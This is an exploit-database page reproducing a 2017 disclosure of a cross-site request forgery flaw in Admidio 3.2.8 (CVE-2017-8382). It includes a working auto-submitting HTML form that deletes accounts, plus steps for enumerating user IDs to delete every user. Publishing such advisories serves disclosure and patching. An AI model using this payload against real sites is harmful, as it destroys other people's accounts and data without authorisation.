Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormFaiz Ahmed ZaidiPACKETSTORM:142503
HistoryMay 15, 2017 - 12:00 a.m.

Admidio 3.2.8 Cross Site Request Forgery

2017-05-1500:00:00
Faiz Ahmed Zaidi
packetstormsecurity.com
15

0.004 Low

EPSS

Percentile

72.2%

JSON
`# Exploit Title :Admidio 3.2.8 (CSRF to Delete Users)  
# Date: 28/April/2017  
# Exploit Author: Faiz Ahmed Zaidi Organization: Provensec LLC Website:   
http://provensec.com/  
# Vendor Homepage: https://www.admidio.org/  
# Software Link: https://www.admidio.org/download.php  
# Version: 3.2.8  
# Tested on: Windows 10 (Xampp)  
# CVE : CVE-2017-8382  
  
  
[Suggested description]  
Admidio 3.2.8 has CSRF in   
adm_program/modules/members/members_function.php with  
an impact of deleting arbitrary user accounts.  
  
------------------------------------------  
  
[Additional Information]  
Using this crafted html form we are able to delete any user with   
admin/user privilege.  
  
<html>  
<body onload="javascript:document.forms[0].submit()">  
<form   
action="http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php">   
  
<input type="hidden" name="usr_id" value='9' />  
<input type="hidden" name="mode" value="3" />  
</form>  
</body>  
</html>  
  
[Affected Component]  
http://localhost/newadmidio/admidio-3.2.8/adm_program/modules/members/members_function.php   
  
  
------------------------------------------  
  
[Attack Type]  
Remote  
  
------------------------------------------  
  
[Impact Escalation of Privileges]  
true  
  
------------------------------------------  
  
[Attack Vectors]  
Steps:  
1.) If an user with admin privilege opens a crafted  
html/JPEG(Image),then both the admin and users with user privilege  
which are mentioned by the user id (as like shown below) in the  
crafted request are deleted.  
  
<input type="hidden" name="usr_id" value='3' />  
  
2.) In admidio by default the userid starts from '0',  
'1' for system '2' for users, so an attacker  
can start from '2' upto 'n' users.  
  
3.)For deleting the user permanently we select 'mode=3'(as like shown  
below),then all admin/low privileged users are deleted.  
  
<input type="hidden" name="mode" value="3" />  
  
------------------------------------------  
  
[Reference]  
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)  
  
Thanks  
Faiz Ahmed Zaidi  
  
`

Related

nvd 1
prion 1
cve 1
zdt 1
exploitpack 1
osv 2
cvelist 1
gitlab 1
github 1
exploitdb 1
nvd
nvd
CVE-2017-8382
2017-05-16 10:29:00
prion
prion
Cross site request forgery (csrf)
2017-05-16 10:29:00
cve
cve
CVE-2017-8382
2017-05-16 10:29:00
zdt
zdt
Admidio 3.2.8 - Cross-Site Request Forgery Vulnerability
2017-05-15 00:00:00
exploitpack
exploitpack
Admidio 3.2.8 - Cross-Site Request Forgery
2017-04-28 00:00:00
osv
osv
admidio CSRF Vulnerability
2022-05-17 02:42:45
CVE-2017-8382
2017-05-16 10:29:00
cvelist
cvelist
CVE-2017-8382
2017-05-16 10:00:00
gitlab
gitlab
Cross-Site Request Forgery (CSRF)
2022-05-17 00:00:00
github
github
admidio CSRF Vulnerability
2022-05-17 02:42:45
exploitdb
exploitdb
Admidio 3.2.8 - Cross-Site Request Forgery
2017-04-28 00:00:00

0.004 Low

EPSS

Percentile

72.2%

JSON
Related for PACKETSTORM:142503
nvd1prion1cve1zdt1exploitpack1osv2cvelist1gitlab1github1exploitdb1